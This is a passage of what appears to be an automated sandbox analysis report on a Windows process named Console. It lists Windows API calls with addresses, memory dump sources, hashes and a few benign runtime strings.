                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C88A5
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C88DD
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C8999
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C89B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 068594b48adf0f5d81c9beb06e608f13e0d492ad96b3bf7910214ffa0bfa15ec
                                                                                                                                                                                                                          • Instruction ID: 77647a5795476b6e06116099520223586f6c27cac2462330f24e1253b2720e63
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 068594b48adf0f5d81c9beb06e608f13e0d492ad96b3bf7910214ffa0bfa15ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2A1B375E102199FDB21CB74DC54BEEBBB8AF15A00F14822DEA09AB351EB309954CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000004,?,?,?,?,?,00000000,00000000,?), ref: 012D482E
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000050,00000000,00000000,?,?,00000004,?,?,?,?,?,00000000,00000000,?), ref: 012D4846
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000), ref: 012D4908
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 012D4920
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000), ref: 012D4942
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000008,00000000), ref: 012D495F
                                                                                                                                                                                                                            • Part of subcall function 012D2AC0: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 012D2B08
                                                                                                                                                                                                                            • Part of subcall function 012D2AC0: HeapAlloc.KERNEL32(03BF0000,00000000,00000070,00000000,00000000,00000000), ref: 012D2B20
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess$Time$CounterFilePerformanceQuerySystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3212095148-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,E8833124,00000105,00000003,00000000,7CAB6A82,00000000), ref: 012D61AA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,E8833124,00000105,00000003,00000000,7CAB6A82,00000000), ref: 012D6203
                                                                                                                                                                                                                          • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,E8833124,00008585), ref: 012D6313
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000000), ref: 012D6364
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,7CAB6A82,00000000), ref: 012D6383
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$strncpy
                                                                                                                                                                                                                          • String ID: ENTRY_ASSEMBLY_NAME
                                                                                                                                                                                                                          • API String ID: 3654647765-1484239926
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,7CAB6A82,00000001,00000000,00000000), ref: 01136570
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01136608
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01136646
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 011366C8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 01136962
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 0113698C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$FromProg
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1545854226-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012DAA6D
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,0000000C), ref: 012DAA8A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 012DABE6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocFreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2113670309-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 012D1B39
                                                                                                                                                                                                                          • GetCurrentProcessorNumberEx.KERNEL32(00000000,?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002,?,00000000,00000000), ref: 012D1B4F
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002,?,00000000,00000000,?), ref: 012D1B7C
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000058,?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002,?), ref: 012D1B99
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002,?,00000000), ref: 012D1BC4
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002), ref: 012D1C05
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Current$AllocCounterFreeNumberPerformanceProcessProcessorQueryThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 579788346-0
                                                                                                                                                                                                                          • Opcode ID: 7239b458701473f83fee90266b47becaa90a9f3bef1244414cdad8681dee4cf2
                                                                                                                                                                                                                          • Instruction ID: 882c29f6a6613d9a707e06cdcda24e07f45e365192fc4055934b1388da6a7c45
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7239b458701473f83fee90266b47becaa90a9f3bef1244414cdad8681dee4cf2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151BDB5A003059FDB20CFA9D984AAABBF4FF58311F01466EE909E7750E730A950CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • iswspace.API-MS-WIN-CRT-STRING-L1-1-0(00000001,7CAB6A82,0164A018,00000001,00000001), ref: 01228355
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 01228392
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000008), ref: 012283AF
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000), ref: 01228424
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,?,00000000), ref: 0122844A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0122849C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess$Freeiswspace
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 496381148-0
                                                                                                                                                                                                                          • Opcode ID: 7d5cfbfa9108f72ac6c3db1608f76aac7354a6470c8fa0bbe38f0225afce07d3
                                                                                                                                                                                                                          • Instruction ID: 07cbe163e1475b988edd11f0989ed530b327d11d50f76082815f7f7689a92cf4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d5cfbfa9108f72ac6c3db1608f76aac7354a6470c8fa0bbe38f0225afce07d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34517B70A1021AAFDB21DFA9DD88BAAB7F8EF58711F1001ADE909E7350DB349940CF50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 012A5AD9
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000FF8,00000000,?,00000000), ref: 012A5AF4
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012A5B46
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,0000000C), ref: 012A5B5E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                          • Opcode ID: 87f3718967c966750e9fe722e21e2ec0e276445d6b4c7caf052885a31ad7c9b3
                                                                                                                                                                                                                          • Instruction ID: 9eeceb8e307b941c69a50d82dfecc5247cd8d4a75e893dae2cc89b5f6f138d67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87f3718967c966750e9fe722e21e2ec0e276445d6b4c7caf052885a31ad7c9b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 925141727103029BE721DF28D844B1BBBD4AB84726F10862DFA88DF391EB75D840CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000004,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3AD3
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000020,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3B0C
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(-0000003C,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3B45
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(-0000003C,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3B7F
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000020,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3BB9
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000004,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3BF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 166494926-0
                                                                                                                                                                                                                          • Opcode ID: 331c0c07033df6bbe724757e3e76af675bbd8d6296c7ff61095a7150bfec7496
                                                                                                                                                                                                                          • Instruction ID: e9c2489652936110ea6c2a9ca6658e3cd0d2e9260be85422e540066cd4ec478c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331c0c07033df6bbe724757e3e76af675bbd8d6296c7ff61095a7150bfec7496
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD51C670500249DFDB11DF65C88ABAEBBB4EF60314F40019CE541D73A1D778A659EBD1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,?,00000000,?,?,?,?,?,?,?,?,?,7CAB6A82), ref: 0141B31A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,7CAB6A82,?,00000000), ref: 0141B330
                                                                                                                                                                                                                          • MapViewOfFileEx.KERNEL32(00000000,00000006,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,7CAB6A82), ref: 0141B361
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,7CAB6A82,?,00000000), ref: 0141B36D
                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,7CAB6A82,?,00000000), ref: 0141B379
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000024,?,?,?,?,?,?,?,?,?,7CAB6A82,?,00000000), ref: 0141B389
                                                                                                                                                                                                                            • Part of subcall function 01219520: GetLastError.KERNEL32(01224192,0164A1AC,00000002,?,?,01223D1E,?), ref: 01219520
                                                                                                                                                                                                                            • Part of subcall function 012195C0: HeapFree.KERNEL32(00000000,0150E144,00000002,00000002,7CAB6A82), ref: 01219692
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLast$View$CloseCreateFreeHandleHeapMappingUnmap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 610960497-0
                                                                                                                                                                                                                          • Opcode ID: 0aa54210b154d05397b14594c8b491d2cd420d2545301e9a284516756cead0d4
                                                                                                                                                                                                                          • Instruction ID: 81355996fc39bf81d68d351b787ebf7c44113608bff49b40620e77f43f4e0f85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aa54210b154d05397b14594c8b491d2cd420d2545301e9a284516756cead0d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F5158B0500709DFEB20DF69C948B9ABBF0FB04714F108A1DE965AB7E4D7B5A514CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,012A2D67,?,0127EF74,7CAB6A82,00000000,8007000E,00000000,00000000,014F12B5,000000FF,?,012A5B94), ref: 012A384C
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,00000000,?,00000000,012A2D67,?,0127EF74,7CAB6A82,00000000,8007000E,00000000,00000000,014F12B5,000000FF,?,012A5B94), ref: 012A3867
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,012A5B94), ref: 012A3870
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,012A2D67,?,0127EF74,7CAB6A82,00000000,8007000E,00000000,00000000,014F12B5,000000FF), ref: 012A3893
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,-00000001,00004000,?,?,?,?,?,?,?,?,?,?,?,?,012A5B94), ref: 012A38BB
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,012A5B94), ref: 012A38CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$HeapVirtual$CloseFileHandleUnmapView
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3290427157-0
                                                                                                                                                                                                                          • Opcode ID: 0da43edc68c084404cfbe0bf544d761fdaa508aa1d58956cdc7c62c765440083
                                                                                                                                                                                                                          • Instruction ID: f07aa986425126fd9547c14f18c374b115619962300b816df4d67efcd1938bbd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0da43edc68c084404cfbe0bf544d761fdaa508aa1d58956cdc7c62c765440083
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F218170310602FFEB28CF25DD49BA1BBB6FF40702F54411CE20197AA4DBB5A465CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(0150E144,00000002,00000000,00000001,00000003,00000000,7CAB6A82), ref: 00FC6E0D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,00000002,7CAB6A82), ref: 00FC6EED
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(0150E144,00000002,DefaultDomain,0000000D,00000004,00000000,7CAB6A82), ref: 00FC6FBD
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82,00000002), ref: 00FCF12B
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,?), ref: 00FC7084
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$strcpy_swcscpy_s
                                                                                                                                                                                                                          • String ID: DefaultDomain
                                                                                                                                                                                                                          • API String ID: 1182151116-1885726810
                                                                                                                                                                                                                          • Opcode ID: 230624109fc8d9ff201e00c5b72edb4b37b050c8724b6127e065c9f57edbd91b
                                                                                                                                                                                                                          • Instruction ID: e6efe3afd1054b0fcdb9fd0c00d16ae637b0a23e809114e7bc0d9cbe204a865c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 230624109fc8d9ff201e00c5b72edb4b37b050c8724b6127e065c9f57edbd91b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EC1BEB5E1421A9BDB14CF94DE96BEEBBB4FF48320F18011DE801B7280D7755944EBA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(_CorDllMain,?,?,?), ref: 00FE351F
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(__CorDllMain@12,?), ref: 00FE3532
                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 00FE354E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp$HandleModule
                                                                                                                                                                                                                          • String ID: _CorDllMain$__CorDllMain@12
                                                                                                                                                                                                                          • API String ID: 3386726176-1519268716
                                                                                                                                                                                                                          • Opcode ID: bc070265144d5eaa7b375d175a3eb7be436f61ee7fba5aebb918201484b4f09e
                                                                                                                                                                                                                          • Instruction ID: 316979d1529c1547c36113533c207a2947de33866d9c9749f418f84177181398
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc070265144d5eaa7b375d175a3eb7be436f61ee7fba5aebb918201484b4f09e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31514B31F0024A9FDB15CF5AD988B6AB7F4AF44318F1841A8D908EB342D771EE419B90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 010D43A0
                                                                                                                                                                                                                          • SleepEx.KERNEL32(000000FF,00000000), ref: 010D43EE
                                                                                                                                                                                                                            • Part of subcall function 01097580: GetStdHandle.KERNEL32(000000F4,00000000,?), ref: 0109758C
                                                                                                                                                                                                                            • Part of subcall function 01097580: strlen.API-MS-WIN-CRT-STRING-L1-1-0(Fatal error. ), ref: 01097596
                                                                                                                                                                                                                            • Part of subcall function 01097580: WriteFile.KERNEL32(00000000,Fatal error. ,00007FFF,?,00000000,00000000), ref: 010975C5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Fatal error while logging another fatal error., xrefs: 010D43BD
                                                                                                                                                                                                                          • Process terminated. , xrefs: 010D4468
                                                                                                                                                                                                                          • Fatal error. , xrefs: 010D4463
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentFileHandleSleepThreadWritestrlen
                                                                                                                                                                                                                          • String ID: Fatal error while logging another fatal error.$Fatal error. $Process terminated.
                                                                                                                                                                                                                          • API String ID: 3820310217-2540833051
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,00000000,?,?), ref: 0108C0AF
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0108C0B9
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,00000000,?,?), ref: 0108C0C9
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0108C0D1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$CountCounterPerformanceProcessQueryThreadTick
                                                                                                                                                                                                                          • String ID: 7
                                                                                                                                                                                                                          • API String ID: 1503542204-1790921346
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B99AA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B99F7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9AB7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012B9AD9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA39A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA3E7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA49D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BA4BF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C595A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C59A7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5A5D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C5A7F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 5f9151a3bdb1dc030abf5d294cda1c22b72609894e3ed2bb92e6d20a2b49328b
                                                                                                                                                                                                                          • Instruction ID: 59f5369b401edc9c08169034d3dfbf974958ad93bc19bd03a510d7e9d8151047
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f9151a3bdb1dc030abf5d294cda1c22b72609894e3ed2bb92e6d20a2b49328b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19D18575A1021A9FDB35CF14DC81BEAB7B8AF14704F0542EDEA49A7241E770AE84CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BFBE7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BFCD4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BFD8D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BFDAF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: ad132196fb841a2e75fca6ea82010a919d945dc047a2f092b75061c9a78b2555
                                                                                                                                                                                                                          • Instruction ID: 5eeffe000d52339963c2fdb7dd3ae6dc8e078773e653b64b92a55d83a77da038
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad132196fb841a2e75fca6ea82010a919d945dc047a2f092b75061c9a78b2555
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CD1AE71A102199FDB20CF64DC85FDAB7B9AF14304F4441EAEA09E7291EB709E94CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C8C77
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C8D64
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C8E1D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C8E3F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
